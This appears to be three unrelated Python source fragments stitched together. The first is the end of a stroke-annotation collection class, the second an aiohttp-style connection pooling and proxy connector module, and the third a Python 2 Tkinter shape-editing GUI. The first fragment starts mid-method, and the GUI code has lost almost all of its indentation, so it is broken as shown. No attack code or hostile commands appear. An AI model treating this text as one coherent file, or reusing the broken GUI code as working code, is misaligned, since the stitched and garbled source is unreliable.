            for s in annotation.Strokes:
                all_collection_annos.update(set(s.findAnnotations(self.collection_annotype)) )
            #For all of the collections that might depend on this annotation
            # Get all of the item annotations that those collections might also depend on
            for col in all_collection_annos:
                for s in col.Strokes:
                    for t in self.item_annotype_list:
                        all_item_annos.update(set(s.findAnnotations(t)) )
            #Remove any collections that may depend on this annotation
            for anno in all_collection_annos:
                self.getBoard().RemoveAnnotation(anno)
            #Rebuild the annotations as needed from the remaining parts
            for anno in all_item_annos:
                if anno is not annotation:
                    self.onAnnotationAdded(anno.Strokes, anno)

    def _merge_all_collections( self ):
        "walk through all of the collections and merge any that should be"
        check_set = set(self.all_collections) # make a copy of the set
        while len(check_set)>0:
            from_anno = check_set.pop()
            # now iterate over the rest of the sets to find overlaps
            for to_anno in check_set:
                didmerge = self.mergeCollections( from_anno, to_anno )
                if didmerge:
                    # calculate the new set of strokes for the collection
                    new_strokes = list( set(from_anno.Strokes).union( set(to_anno.Strokes) ) )
                    # now tell the board about what is happening
                    self.getBoard().UpdateAnnotation( to_anno, new_strokes )
                    self.getBoard().RemoveAnnotation( from_anno )
                    # we just removed the "from" anno so we don't need to try and merge
                    # it any more. Just pop out of this inner loop and get a new "from"
                    break

    def mergeCollections( self, from_anno, to_anno ):
        "Input: two collection anotations. Return false if they should not be merged, otherwise merge them"
        # this should merge everything from "from_anno" into "to_anno". to_anno will be removed from the
        # board if this function returns true.
        logger.error("failure to implement virtual method 'mergeCollections'")
        raise NotImplementedError

    def collectionFromItem( self, strokes, annotation ):
        "Input: strokes and source annotation. Return a new collection anno from this single base item annotation"
        logger.error("failure to implement virtual method 'newCollectionAnno'")
        raise NotImplementedError
#-------------------------------------
# if executed by itself, run all the doc tests
if __name__ == "__main__":
    # route doctest output through the module logger before running
    Logger.setDoctest(logger)
    import doctest
    doctest.testmod()
| |
import asyncio
import aiohttp
import functools
import http.cookies
import ssl
import sys
import traceback
import warnings
from collections import defaultdict
from hashlib import md5, sha1, sha256
from itertools import chain
from math import ceil
from types import MappingProxyType
from . import hdrs
from .client import ClientRequest
from .errors import ServerDisconnectedError
from .errors import HttpProxyError, ProxyConnectionError
from .errors import ClientOSError, ClientTimeoutError
from .errors import FingerprintMismatch
from .helpers import BasicAuth
from .resolver import DefaultResolver
__all__ = ('BaseConnector', 'TCPConnector', 'ProxyConnector', 'UnixConnector')
PY_343 = sys.version_info >= (3, 4, 3)
HASHFUNC_BY_DIGESTLEN = {
16: md5,
20: sha1,
32: sha256,
}
class Connection(object):
    """A single acquired transport/protocol pair.

    close()/release() hand the transport back to the owning connector
    exactly once; an instance garbage-collected while still holding a
    transport emits a ResourceWarning.
    """

    _source_traceback = None
    _transport = None

    def __init__(self, connector, key, request, transport, protocol, loop):
        self._connector = connector
        self._key = key
        self._request = request
        self._transport = transport
        self._protocol = protocol
        self._loop = loop
        self.reader = protocol.reader
        self.writer = protocol.writer
        if loop.get_debug():
            # remember where this connection was created for diagnostics
            self._source_traceback = traceback.extract_stack(sys._getframe(1))

    def __repr__(self):
        return 'Connection<{}>'.format(self._key)

    def __del__(self, _warnings=warnings):
        if self._transport is None:
            return
        _warnings.warn('Unclosed connection {!r}'.format(self),
                       ResourceWarning)
        if hasattr(self._loop, 'is_closed') and self._loop.is_closed():
            # loop already gone: nothing can be released or reported
            return
        self._connector._release(
            self._key, self._request, self._transport, self._protocol,
            should_close=True)
        context = {'client_connection': self,
                   'message': 'Unclosed connection'}
        if self._source_traceback is not None:
            context['source_traceback'] = self._source_traceback
        self._loop.call_exception_handler(context)

    @property
    def loop(self):
        return self._loop

    def _hand_back(self, should_close):
        # Return the transport to the connector at most once.
        if self._transport is None:
            return
        self._connector._release(
            self._key, self._request, self._transport, self._protocol,
            should_close=should_close)
        self._transport = None

    def close(self):
        """Release the transport and force the connector to close it."""
        self._hand_back(True)

    def release(self):
        """Release the transport back to the connector's idle pool."""
        self._hand_back(False)

    def detach(self):
        """Forget the transport without releasing it to the connector."""
        self._transport = None

    @property
    def closed(self):
        return self._transport is None
class BaseConnector(object):
    """Base connector class.

    :param conn_timeout: (optional) Connect timeout.
    :param keepalive_timeout: (optional) Keep-alive timeout.
    :param bool force_close: Set to True to force close and do reconnect
        after each request (and between redirects).
    :param loop: Optional event loop.
    """

    _closed = True  # prevent AttributeError in __del__ if ctor was failed
    _source_traceback = None

    def __init__(self, *, conn_timeout=None, keepalive_timeout=30,
                 share_cookies=False, force_close=False, limit=None,
                 loop=None):
        if loop is None:
            loop = asyncio.get_event_loop()
        self._closed = False
        if loop.get_debug():
            # remember where the connector was created for diagnostics
            self._source_traceback = traceback.extract_stack(sys._getframe(1))
        # key -> list of idle (transport, protocol, release_time) tuples
        self._conns = {}
        # key -> set of transports currently handed out to Connections
        self._acquired = defaultdict(set)
        self._conn_timeout = conn_timeout
        self._keepalive_timeout = keepalive_timeout
        if share_cookies:
            warnings.warn(
                'Using `share_cookies` is deprecated. '
                'Use Session object instead', DeprecationWarning)
        self._share_cookies = share_cookies
        self._cleanup_handle = None
        self._force_close = force_close
        self._limit = limit
        # key -> futures of callers waiting for a free slot (when limit set)
        self._waiters = defaultdict(list)
        self._loop = loop
        self._factory = functools.partial(
            aiohttp.StreamProtocol, loop=loop,
            disconnect_error=ServerDisconnectedError)
        self.cookies = http.cookies.SimpleCookie()

    def __del__(self, _warnings=warnings):
        # Warn (and report to the loop's exception handler) when the
        # connector is garbage-collected with live idle connections.
        if self._closed:
            return
        if not self._conns:
            return
        conns = [repr(c) for c in self._conns.values()]
        self.close()
        _warnings.warn("Unclosed connector {!r}".format(self),
                       ResourceWarning)
        context = {'connector': self,
                   'connections': conns,
                   'message': 'Unclosed connector'}
        if self._source_traceback is not None:
            context['source_traceback'] = self._source_traceback
        self._loop.call_exception_handler(context)

    @property
    def force_close(self):
        """Ultimately close connection on releasing if True."""
        return self._force_close

    @property
    def limit(self):
        """The limit for simultaneous connections to the same endpoint.

        Endpoints are the same if they are have equal
        (host, port, is_ssl) triple.

        If limit is None the connector has no limit (default).
        """
        return self._limit

    def _cleanup(self):
        """Cleanup unused transports."""
        if self._cleanup_handle:
            self._cleanup_handle.cancel()
            self._cleanup_handle = None

        now = self._loop.time()

        connections = {}
        timeout = self._keepalive_timeout

        for key, conns in self._conns.items():
            alive = []
            for transport, proto, t0 in conns:
                if transport is not None:
                    if proto and not proto.is_connected():
                        # peer disconnected: drop the transport
                        transport = None
                    else:
                        delta = t0 + self._keepalive_timeout - now
                        if delta < 0:
                            # keep-alive expired: close it
                            transport.close()
                            transport = None
                        elif delta < timeout:
                            # remember the soonest upcoming expiry so the
                            # next cleanup runs exactly then
                            timeout = delta

                if transport is not None:
                    alive.append((transport, proto, t0))
            if alive:
                connections[key] = alive

        # reschedule only while idle connections remain
        if connections:
            self._cleanup_handle = self._loop.call_at(
                ceil(now + timeout), self._cleanup)

        self._conns = connections

    def _start_cleanup_task(self):
        # arm the periodic cleanup if it is not already scheduled
        if self._cleanup_handle is None:
            now = self._loop.time()
            self._cleanup_handle = self._loop.call_at(
                ceil(now + self._keepalive_timeout), self._cleanup)

    def close(self):
        """Close all opened transports."""
        # returns an already-completed future so callers may yield on it
        ret = asyncio.Future(loop=self._loop)
        ret.set_result(None)
        if self._closed:
            return ret
        self._closed = True

        try:
            if hasattr(self._loop, 'is_closed'):
                if self._loop.is_closed():
                    return ret

            # close idle pooled transports and transports still in use
            for key, data in self._conns.items():
                for transport, proto, t0 in data:
                    transport.close()

            for transport in chain(*self._acquired.values()):
                transport.close()

            if self._cleanup_handle:
                self._cleanup_handle.cancel()

        finally:
            self._conns.clear()
            self._acquired.clear()
            self._cleanup_handle = None
        return ret

    @property
    def closed(self):
        """Is connector closed.

        A readonly property.
        """
        return self._closed

    def update_cookies(self, cookies):
        """Update shared cookies.

        Deprecated, use ClientSession instead.
        """
        if isinstance(cookies, dict):
            cookies = cookies.items()

        for name, value in cookies:
            if PY_343:
                self.cookies[name] = value
            else:
                if isinstance(value, http.cookies.Morsel):
                    # use dict method because SimpleCookie class modifies value
                    dict.__setitem__(self.cookies, name, value)
                else:
                    self.cookies[name] = value

    @asyncio.coroutine
    def connect(self, req):
        """Get from pool or create new connection."""
        key = (req.host, req.port, req.ssl)

        limit = self._limit
        if limit is not None:
            fut = asyncio.Future(loop=self._loop)
            waiters = self._waiters[key]

            # The limit defines the maximum number of concurrent connections
            # for a key. Waiters must be counted against the limit, even before
            # the underlying connection is created.
            available = limit - len(waiters) - len(self._acquired[key])

            # Don't wait if there are connections available.
            if available > 0:
                fut.set_result(None)

            # This connection will now count towards the limit.
            waiters.append(fut)

            yield from fut

        transport, proto = self._get(key)
        if transport is None:
            try:
                if self._conn_timeout:
                    transport, proto = yield from asyncio.wait_for(
                        self._create_connection(req),
                        self._conn_timeout, loop=self._loop)
                else:
                    transport, proto = yield from self._create_connection(req)
            except asyncio.TimeoutError as exc:
                raise ClientTimeoutError(
                    'Connection timeout to host {0[0]}:{0[1]} ssl:{0[2]}'
                    .format(key)) from exc
            except OSError as exc:
                raise ClientOSError(
                    exc.errno,
                    'Cannot connect to host {0[0]}:{0[1]} ssl:{0[2]} [{1}]'
                    .format(key, exc.strerror)) from exc

        self._acquired[key].add(transport)
        conn = Connection(self, key, req, transport, proto, self._loop)
        return conn

    def _get(self, key):
        # Pop an idle, still-alive pooled connection for `key`, or
        # (None, None) when none is usable. Stale entries are discarded.
        try:
            conns = self._conns[key]
        except KeyError:
            return None, None

        t1 = self._loop.time()
        while conns:
            transport, proto, t0 = conns.pop()
            if transport is not None and proto.is_connected():
                if t1 - t0 > self._keepalive_timeout:
                    # idle longer than keep-alive: close and keep looking
                    transport.close()
                    transport = None
                else:
                    if not conns:
                        # The very last connection was reclaimed: drop the key
                        del self._conns[key]
                    return transport, proto

        # No more connections: drop the key
        del self._conns[key]
        return None, None

    def _release(self, key, req, transport, protocol, *, should_close=False):
        # Take back a transport from a Connection: either return it to the
        # idle pool or close it, and wake one limit-waiter if a slot opened.
        if self._closed:
            # acquired connection is already released on connector closing
            return

        acquired = self._acquired[key]
        try:
            acquired.remove(transport)
        except KeyError:  # pragma: no cover
            # this may be result of undetermenistic order of objects
            # finalization due garbage collection.
            pass
        else:
            if self._limit is not None and len(acquired) < self._limit:
                waiters = self._waiters[key]
                while waiters:
                    waiter = waiters.pop(0)
                    if not waiter.done():
                        waiter.set_result(None)
                        break

        resp = req.response

        if not should_close:
            if self._force_close:
                should_close = True
            elif resp is not None:
                # the response decides whether the connection is reusable
                should_close = resp._should_close

        reader = protocol.reader
        if should_close or (reader.output and not reader.output.at_eof()):
            # unread payload left on the wire: the connection is unusable
            transport.close()
        else:
            conns = self._conns.get(key)
            if conns is None:
                conns = self._conns[key] = []
            conns.append((transport, protocol, self._loop.time()))
            reader.unset_parser()

            self._start_cleanup_task()

    @asyncio.coroutine
    def _create_connection(self, req):
        # subclass hook: must return a (transport, protocol) pair
        raise NotImplementedError()
# ssl.OP_NO_COMPRESSION is missing on some Python/OpenSSL builds;
# 0 is a harmless no-op flag in that case.
_SSL_OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
# Sentinel distinguishing "argument not passed" from an explicit value.
_marker = object()
class TCPConnector(BaseConnector):
    """TCP connector.

    :param bool verify_ssl: Set to True to check ssl certifications.
    :param bytes fingerprint: Pass the binary md5, sha1, or sha256
        digest of the expected certificate in DER format to verify
        that the certificate the server presents matches. See also
        https://en.wikipedia.org/wiki/Transport_Layer_Security#Certificate_pinning
    :param bool resolve: (Deprecated) Set to True to do DNS lookup for
        host name.
    :param AbstractResolver resolver: Enable DNS lookups and use this
        resolver
    :param bool use_dns_cache: Use memory cache for DNS lookups.
    :param family: socket address family
    :param local_addr: local :class:`tuple` of (host, port) to bind socket to
    :param args: see :class:`BaseConnector`
    :param kwargs: see :class:`BaseConnector`
    """

    def __init__(self, *, verify_ssl=True, fingerprint=None,
                 resolve=_marker, use_dns_cache=_marker,
                 family=0, ssl_context=None, local_addr=None, resolver=None,
                 **kwargs):
        super().__init__(**kwargs)

        # verify_ssl=False and a custom ssl_context are mutually exclusive
        if not verify_ssl and ssl_context is not None:
            raise ValueError(
                "Either disable ssl certificate validation by "
                "verify_ssl=False or specify ssl_context, not both.")

        self._verify_ssl = verify_ssl

        if fingerprint:
            # pick the hash algorithm from the digest length (md5/sha1/sha256)
            digestlen = len(fingerprint)
            hashfunc = HASHFUNC_BY_DIGESTLEN.get(digestlen)
            if not hashfunc:
                raise ValueError('fingerprint has invalid length')
            self._hashfunc = hashfunc
        self._fingerprint = fingerprint

        if resolve is not _marker:
            warnings.warn(("resolve parameter is deprecated, "
                           "use use_dns_cache instead"),
                          DeprecationWarning, stacklevel=2)

        # reconcile the deprecated `resolve` flag with `use_dns_cache`
        if use_dns_cache is not _marker and resolve is not _marker:
            if use_dns_cache != resolve:
                raise ValueError("use_dns_cache must agree with resolve")
            _use_dns_cache = use_dns_cache
        elif use_dns_cache is not _marker:
            _use_dns_cache = use_dns_cache
        elif resolve is not _marker:
            _use_dns_cache = resolve
        else:
            _use_dns_cache = False

        self._resolver = resolver or DefaultResolver(loop=self._loop)

        # resolving is active when caching was requested or an explicit
        # resolver instance was supplied
        if _use_dns_cache or resolver:
            self._use_resolver = True
        else:
            self._use_resolver = False

        self._use_dns_cache = _use_dns_cache
        self._cached_hosts = {}
        self._ssl_context = ssl_context
        self._family = family
        self._local_addr = local_addr

    @property
    def verify_ssl(self):
        """Do check for ssl certifications?"""
        return self._verify_ssl

    @property
    def fingerprint(self):
        """Expected ssl certificate fingerprint."""
        return self._fingerprint

    @property
    def ssl_context(self):
        """SSLContext instance for https requests.

        Lazy property, creates context on demand.
        """
        if self._ssl_context is None:
            if not self._verify_ssl:
                # permissive context: no cert verification, but SSLv2/v3
                # and TLS compression are still disabled
                sslcontext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
                sslcontext.options |= ssl.OP_NO_SSLv2
                sslcontext.options |= ssl.OP_NO_SSLv3
                sslcontext.options |= _SSL_OP_NO_COMPRESSION
                sslcontext.set_default_verify_paths()
            else:
                sslcontext = ssl.create_default_context()
            self._ssl_context = sslcontext
        return self._ssl_context

    @property
    def family(self):
        """Socket family like AF_INET."""
        return self._family

    @property
    def use_dns_cache(self):
        """True if local DNS caching is enabled."""
        return self._use_dns_cache

    @property
    def cached_hosts(self):
        """Read-only dict of cached DNS record."""
        return MappingProxyType(self._cached_hosts)

    def clear_dns_cache(self, host=None, port=None):
        """Remove specified host/port or clear all dns local cache."""
        if host is not None and port is not None:
            self._cached_hosts.pop((host, port), None)
        elif host is not None or port is not None:
            raise ValueError("either both host and port "
                             "or none of them are allowed")
        else:
            self._cached_hosts.clear()

    @property
    def resolve(self):
        """Do DNS lookup for host name?"""
        warnings.warn((".resolve property is deprecated, "
                       "use .dns_cache instead"),
                      DeprecationWarning, stacklevel=2)
        return self.use_dns_cache

    @property
    def resolved_hosts(self):
        """The dict of (host, port) -> (ipaddr, port) pairs."""
        warnings.warn((".resolved_hosts property is deprecated, "
                       "use .cached_hosts instead"),
                      DeprecationWarning, stacklevel=2)
        return self.cached_hosts

    def clear_resolved_hosts(self, host=None, port=None):
        """Remove specified host/port or clear all resolve cache."""
        warnings.warn((".clear_resolved_hosts() is deprecated, "
                       "use .clear_dns_cache() instead"),
                      DeprecationWarning, stacklevel=2)
        if host is not None and port is not None:
            self.clear_dns_cache(host, port)
        else:
            self.clear_dns_cache()

    @asyncio.coroutine
    def _resolve_host(self, host, port):
        # Return a list of addrinfo-like dicts for (host, port), either
        # passing the name through untouched, or resolving (with optional
        # caching) via the configured resolver.
        if not self._use_resolver:
            return [{'hostname': host, 'host': host, 'port': port,
                     'family': self._family, 'proto': 0, 'flags': 0}]

        assert self._resolver

        if self._use_dns_cache:
            key = (host, port)

            if key not in self._cached_hosts:
                self._cached_hosts[key] = yield from \
                    self._resolver.resolve(host, port, family=self._family)

            return self._cached_hosts[key]
        else:
            res = yield from self._resolver.resolve(
                host, port, family=self._family)
            return res

    @asyncio.coroutine
    def _create_connection(self, req):
        """Create connection.

        Has same keyword arguments as BaseEventLoop.create_connection.
        """
        if req.ssl:
            sslcontext = self.ssl_context
        else:
            sslcontext = None

        hosts = yield from self._resolve_host(req.host, req.port)
        exc = None

        # try each resolved address in turn; first success wins
        for hinfo in hosts:
            try:
                host = hinfo['host']
                port = hinfo['port']
                transp, proto = yield from self._loop.create_connection(
                    self._factory, host, port,
                    ssl=sslcontext, family=hinfo['family'],
                    proto=hinfo['proto'], flags=hinfo['flags'],
                    server_hostname=hinfo['hostname'] if sslcontext else None,
                    local_addr=self._local_addr)
                has_cert = transp.get_extra_info('sslcontext')
                if has_cert and self._fingerprint:
                    sock = transp.get_extra_info('socket')
                    if not hasattr(sock, 'getpeercert'):
                        # Workaround for asyncio 3.5.0
                        # Starting from 3.5.1 version
                        # there is 'ssl_object' extra info in transport
                        sock = transp._ssl_protocol._sslpipe.ssl_object
                    # gives DER-encoded cert as a sequence of bytes (or None)
                    cert = sock.getpeercert(binary_form=True)
                    assert cert
                    got = self._hashfunc(cert).digest()
                    expected = self._fingerprint
                    if got != expected:
                        # pinned certificate mismatch: refuse the connection
                        transp.close()
                        raise FingerprintMismatch(expected, got, host, port)
                return transp, proto
            except OSError as e:
                exc = e
        else:
            # every address failed: surface the last OSError
            # NOTE(review): if `hosts` were empty, exc would be None here
            # and exc.errno would raise -- presumably resolvers never
            # return an empty list; confirm.
            raise ClientOSError(exc.errno,
                                'Can not connect to %s:%s [%s]' %
                                (req.host, req.port, exc.strerror)) from exc
class ProxyConnector(TCPConnector):
    """Http Proxy connector.

    :param str proxy: Proxy URL address. Only HTTP proxy supported.
    :param proxy_auth: (optional) Proxy HTTP Basic Auth
    :type proxy_auth: aiohttp.helpers.BasicAuth
    :param args: see :class:`TCPConnector`
    :param kwargs: see :class:`TCPConnector`

    Usage:

    >>> conn = ProxyConnector(proxy="http://some.proxy.com")
    >>> session = ClientSession(connector=conn)
    >>> resp = yield from session.get('http://python.org')

    """

    def __init__(self, proxy, *, proxy_auth=None, force_close=True,
                 **kwargs):
        # proxied connections default to force_close=True
        super().__init__(force_close=force_close, **kwargs)
        self._proxy = proxy
        self._proxy_auth = proxy_auth
        assert proxy.startswith('http://'), (
            "Only http proxy supported", proxy)
        assert proxy_auth is None or isinstance(proxy_auth, BasicAuth), (
            "proxy_auth must be None or BasicAuth() tuple", proxy_auth)

    @property
    def proxy(self):
        """Proxy URL."""
        return self._proxy

    @property
    def proxy_auth(self):
        """Proxy auth info.

        Should be BasicAuth instance.
        """
        return self._proxy_auth

    @asyncio.coroutine
    def _create_connection(self, req):
        # First open a TCP connection to the proxy itself.
        proxy_req = ClientRequest(
            hdrs.METH_GET, self._proxy,
            headers={hdrs.HOST: req.host},
            auth=self._proxy_auth,
            loop=self._loop)
        try:
            transport, proto = yield from super()._create_connection(proxy_req)
        except OSError as exc:
            raise ProxyConnectionError(*exc.args) from exc

        if not req.ssl:
            # plain HTTP through a proxy uses absolute-URI request lines
            req.path = '{scheme}://{host}{path}'.format(scheme=req.scheme,
                                                        host=req.netloc,
                                                        path=req.path)
        if hdrs.AUTHORIZATION in proxy_req.headers:
            # move basic-auth credentials to the Proxy-Authorization header
            # (on the origin request for plain HTTP, on the CONNECT
            # request for HTTPS)
            auth = proxy_req.headers[hdrs.AUTHORIZATION]
            del proxy_req.headers[hdrs.AUTHORIZATION]
            if not req.ssl:
                req.headers[hdrs.PROXY_AUTHORIZATION] = auth
            else:
                proxy_req.headers[hdrs.PROXY_AUTHORIZATION] = auth

        if req.ssl:
            # For HTTPS requests over HTTP proxy
            # we must notify proxy to tunnel connection
            # so we send CONNECT command:
            #   CONNECT www.python.org:443 HTTP/1.1
            #   Host: www.python.org
            #
            # next we must do TLS handshake and so on
            # to do this we must wrap raw socket into secure one
            # asyncio handles this perfectly
            proxy_req.method = hdrs.METH_CONNECT
            proxy_req.path = '{}:{}'.format(req.host, req.port)
            key = (req.host, req.port, req.ssl)
            conn = Connection(self, key, proxy_req,
                              transport, proto, self._loop)
            self._acquired[key].add(conn._transport)
            proxy_resp = proxy_req.send(conn.writer, conn.reader)
            try:
                resp = yield from proxy_resp.start(conn, True)
            except:
                # intentionally broad: close everything, then re-raise
                proxy_resp.close()
                conn.close()
                raise
            else:
                conn.detach()
                if resp.status != 200:
                    raise HttpProxyError(code=resp.status,
                                         message=resp.reason)
                rawsock = transport.get_extra_info('socket', default=None)
                if rawsock is None:
                    raise RuntimeError(
                        "Transport does not expose socket instance")
                transport.pause_reading()
                # re-wrap the tunnelled raw socket with TLS towards the
                # origin server
                transport, proto = yield from self._loop.create_connection(
                    self._factory, ssl=self.ssl_context, sock=rawsock,
                    server_hostname=req.host)
            finally:
                proxy_resp.close()

        return transport, proto
class UnixConnector(BaseConnector):
    """Unix socket connector.

    :param str path: Unix socket path.
    :param args: see :class:`BaseConnector`
    :param kwargs: see :class:`BaseConnector`

    Usage:

    >>> conn = UnixConnector(path='/path/to/socket')
    >>> session = ClientSession(connector=conn)
    >>> resp = yield from session.get('http://python.org')

    """

    def __init__(self, path, **kwargs):
        super().__init__(**kwargs)
        self._path = path

    @property
    def path(self):
        """Path to unix socket."""
        return self._path

    @asyncio.coroutine
    def _create_connection(self, req):
        # connect over the configured unix socket; the request target is
        # irrelevant for establishing the transport
        transport, protocol = yield from self._loop.create_unix_connection(
            self._factory, self._path)
        return transport, protocol
| |
import shape as sp
from Tkinter import *
import fileManager as fm
#from PIL import Image, ImageTk
from ModelBuilder import ModelBuilder
from texture import Texture
from texture import Point
import cv2
import camera
class App:
def __init__(self, master):
    """Build the application: initialise state, load test shapes from
    file and construct the UI."""
    self.master = master
    self.master.title("cv_recontruction")
    self.imgFile = "project.gif"
    # init parameters
    self.shapes = []                    # all shapes in the model
    self.state = 1                      # which frame set is shown
    self.currentIndex = -1              # index of the selected shape
    self.newShapeFlag = True
    self.updateRightFrame2Flag = True
    # create object for test purpose
    FM = fm.FileManager()
    self.shapes = FM.importShapes("Standard_Input.txt")
    self.initUI()
    self.clear()
def initUI(self):
    """Create all frames, draw the imported shapes and display the
    initial state."""
    self.initTopFrames()
    self.initLeftFrame()
    self.initRightFrames()
    self.drawShapes()
    # show topframe 1 and right frame
    self.show(self.state)
def drawShapes(self):
for s in self.shapes:
if isinstance(s, sp.Tree):
print "tree"
else:
for f in s.faces:
for i in range(len(f.facePoints) -1 ):
lineId = self.canvas.create_line(f.facePoints[i][0], f.facePoints[i][1],
f.facePoints[i+1][0], f.facePoints[i+1][1], fill="red")
f.lineIds.append(lineId)
lineId = self.canvas.create_line(f.facePoints[0][0], f.facePoints[0][1],
f.facePoints[len(f.facePoints)-1][0], f.facePoints[len(f.facePoints)-1][1], fill="red")
f.lineIds.append(lineId)
def clear(self):
self.pointId = ""
self.points = []
self.lineIds = []
def testPrint(self):
print ""
print ""
for x in xrange(len(self.shapes)):
print self.shapes[x].name
if isinstance(self.shapes[x], sp.Cylinder):
print "center = ", self.shapes[x].center
print "radius = ", self.shapes[x].radius
print "height = ", self.shapes[x].height
elif isinstance(self.shapes[x], sp.Cuboid) or isinstance(self.shapes[self.currentIndex], sp.Prism):
print "center = ", self.shapes[x].center
print "length = ", self.shapes[x].length
print "width = ", self.shapes[x].width
print "height = ", self.shapes[x].height
elif isinstance(self.shapes[x], sp.Frustum):
print "center = ", self.shapes[x].center
print "upperLength = ", self.shapes[x].upperLength
print "lowerLength = ", self.shapes[x].lowerLength
print "upperWidth = ", self.shapes[x].upperWidth
print "lowerWidth = ", self.shapes[x].lowerWidth
print "height = ", self.shapes[x].height
elif isinstance(self.shapes[x], sp.Tree):
print "center = ", self.shapes[x].center
print "height = ", self.shapes[x].height
print ""
def fecthRightFrame2Data(self):
if isinstance(self.shapes[self.currentIndex], sp.Cylinder):
for i in range(6):
self.pEntries[i].delete(0, END)
self.pEntries[1].insert(0, self.shapes[self.currentIndex].center[0])
self.pEntries[2].insert(0, self.shapes[self.currentIndex].center[1])
self.pEntries[3].insert(0, self.shapes[self.currentIndex].center[2])
self.pEntries[4].insert(0, self.shapes[self.currentIndex].radius)
self.pEntries[5].insert(0, self.shapes[self.currentIndex].height)
elif isinstance(self.shapes[self.currentIndex], sp.Cuboid) or isinstance(self.shapes[self.currentIndex],
sp.Prism):
for i in range(7):
self.pEntries[i].delete(0, END)
self.pEntries[1].insert(0, self.shapes[self.currentIndex].center[0])
self.pEntries[2].insert(0, self.shapes[self.currentIndex].center[1])
self.pEntries[3].insert(0, self.shapes[self.currentIndex].center[2])
self.pEntries[4].insert(0, self.shapes[self.currentIndex].length)
self.pEntries[5].insert(0, self.shapes[self.currentIndex].width)
self.pEntries[6].insert(0, self.shapes[self.currentIndex].height)
elif isinstance(self.shapes[self.currentIndex], sp.Frustum):
for i in range(9):
self.pEntries[i].delete(0, END)
self.pEntries[1].insert(0, self.shapes[self.currentIndex].center[0])
self.pEntries[2].insert(0, self.shapes[self.currentIndex].center[1])
self.pEntries[3].insert(0, self.shapes[self.currentIndex].center[2])
self.pEntries[4].insert(0, self.shapes[self.currentIndex].upperLength)
self.pEntries[5].insert(0, self.shapes[self.currentIndex].upperWidth)
self.pEntries[6].insert(0, self.shapes[self.currentIndex].lowerLength)
self.pEntries[7].insert(0, self.shapes[self.currentIndex].lowerWidth)
self.pEntries[8].insert(0, self.shapes[self.currentIndex].height)
elif isinstance(self.shapes[self.currentIndex], sp.Tree):
for i in range(5):
self.pEntries[i].delete(0, END)
self.pEntries[1].insert(0, self.shapes[self.currentIndex].center[0])
self.pEntries[2].insert(0, self.shapes[self.currentIndex].center[1])
self.pEntries[3].insert(0, self.shapes[self.currentIndex].center[2])
self.pEntries[4].insert(0, self.shapes[self.currentIndex].height)
#no entries for ground and sky
self.pEntries[0].insert(0, self.shapes[self.currentIndex].name)
def updateFacesList(self):
self.facesList.delete(0, END)
for item in self.shapes[self.currentIndex].faces:
self.facesList.insert(END, item.faceOrientation) # orientation
# pragma mark -- init frames
def initTopFrames(self):
# top frame 1
self.topFrame1 = Frame(self.master, width=900 + 20, height=30, bd=1, relief=SUNKEN)
self.shape = StringVar(self.master)
self.shape.set("cylinder") # default value
self.shapeOptionMenu = OptionMenu(self.topFrame1, self.shape, "cylinder", "cuboid", "prism", "frustum", "tree",
"ground", "sky")
self.newShapeButton = Button(self.topFrame1, text="create new shape", command=self.newShapeButton)
self.generateVideoButton = Button(self.topFrame1, text="generate models", command=self.generateVideoButton)
#top frame 2
self.topFrame2 = Frame(self.master, width=900 + 20, height=30, bd=1, relief=SUNKEN)
self.cancelButton2 = Button(self.topFrame2, text="cancel", command=self.cancelButton2)
self.doneButton2 = Button(self.topFrame2, text="done", command=self.doneButton2)
#top frame 3
self.topFrame3 = Frame(self.master, width=900 + 20, height=30, bd=1, relief=SUNKEN)
self.cancelButton3 = Button(self.topFrame3, text="cancel", command=self.cancelButton3)
self.doneButton3 = Button(self.topFrame3, text="done", command=self.doneButton3)
def initLeftFrame(self):
# load image use PIL library
#self.img = Image.open(self.imgFile)
#angle = 180
tkImage = PhotoImage(file = self.imgFile)
#window frame configuration
self.leftFrame = Frame(self.master)
self.leftFrame.grid(row=1, column=0)
#self.leftFrame.grid_rowconfigure(0, weight=1) #strenth to row
#self.leftFrame.grid_columnconfigure(0, weight=1)
#define scroll bar
xscrollbar = Scrollbar(self.leftFrame, orient=HORIZONTAL)
xscrollbar.grid(row=1, column=0, sticky=E + W)
yscrollbar = Scrollbar(self.leftFrame)
yscrollbar.grid(row=0, column=1, sticky=N + S)
#create canvas to load the image
self.canvas = Canvas(self.leftFrame, width=900 + 20, height=600 + 20, xscrollcommand=xscrollbar.set,
yscrollcommand=yscrollbar.set)
self.canvas.create_image(10, 10, anchor=NW, image=tkImage)
self.canvas.image = tkImage #hold a reference
self.canvas.bind("<Button-1>", self.canvasClicked)
#canvas.pack(fill = BOTH, expand = 1)
self.canvas.grid(row=0, column=0, sticky=N + S + E + W)
#config scroll bar
self.canvas.config(scrollregion=self.canvas.bbox(ALL))
xscrollbar.config(command=self.canvas.xview)
yscrollbar.config(command=self.canvas.yview)
def initRightFrames(self):
self.rightFrame1 = Frame(self.master, width=250, height=600 + 20 + 30, bd=1, relief=SUNKEN)
self.listLabel = Label(self.rightFrame1, text="All Shapes")
self.shapesList = Listbox(self.rightFrame1, height=30)
for item in self.shapes:
self.shapesList.insert(END, item.name)
self.editButton = Button(self.rightFrame1, text="edit", command=self.editButton1)
self.deleteButton = Button(self.rightFrame1, text="delete", command=self.deleteButton)
# init right frame 2
self.rightFrame2 = Frame(self.master, width=250, height=600 + 20 + 30, bd=1, relief=SUNKEN)
self.pLabels = [0, 0, 0, 0, 0, 0, 0]
self.pEntries = [0, 0, 0, 0, 0, 0, 0, 0, 0]
for i in xrange(7):
self.pLabels[i] = Label(self.rightFrame2)
self.pEntries[i] = Entry(self.rightFrame2)
for i in range(6, 9):
self.pEntries[i] = Entry(self.rightFrame2)
self.pEntries[1].config(width=7)
self.pEntries[2].config(width=7)
self.pEntries[3].config(width=7)
self.faceListLabel = Label(self.rightFrame2, text="All Faces")
self.facesList = Listbox(self.rightFrame2, height=15)
self.addFaceButton = Button(self.rightFrame2, text="add new face", command=self.addFaceButton)
self.deleteFaceButton = Button(self.rightFrame2, text="delete", command=self.deleteFaceButton)
#init right frame 3
self.rightFrame3 = Frame(self.master, width=250, height=600 + 20 + 30, bd=1, relief=SUNKEN)
self.faceDirLabel = Label(self.rightFrame3, text="Orientation: ")
self.faceDir = StringVar(self.master)
self.faceDir.set("Left") # default value
self.faceOptionMenu = OptionMenu(self.rightFrame3, self.faceDir, "Left", "Right", "Upper", "Front","Surface")
# pragma mark -- show frames
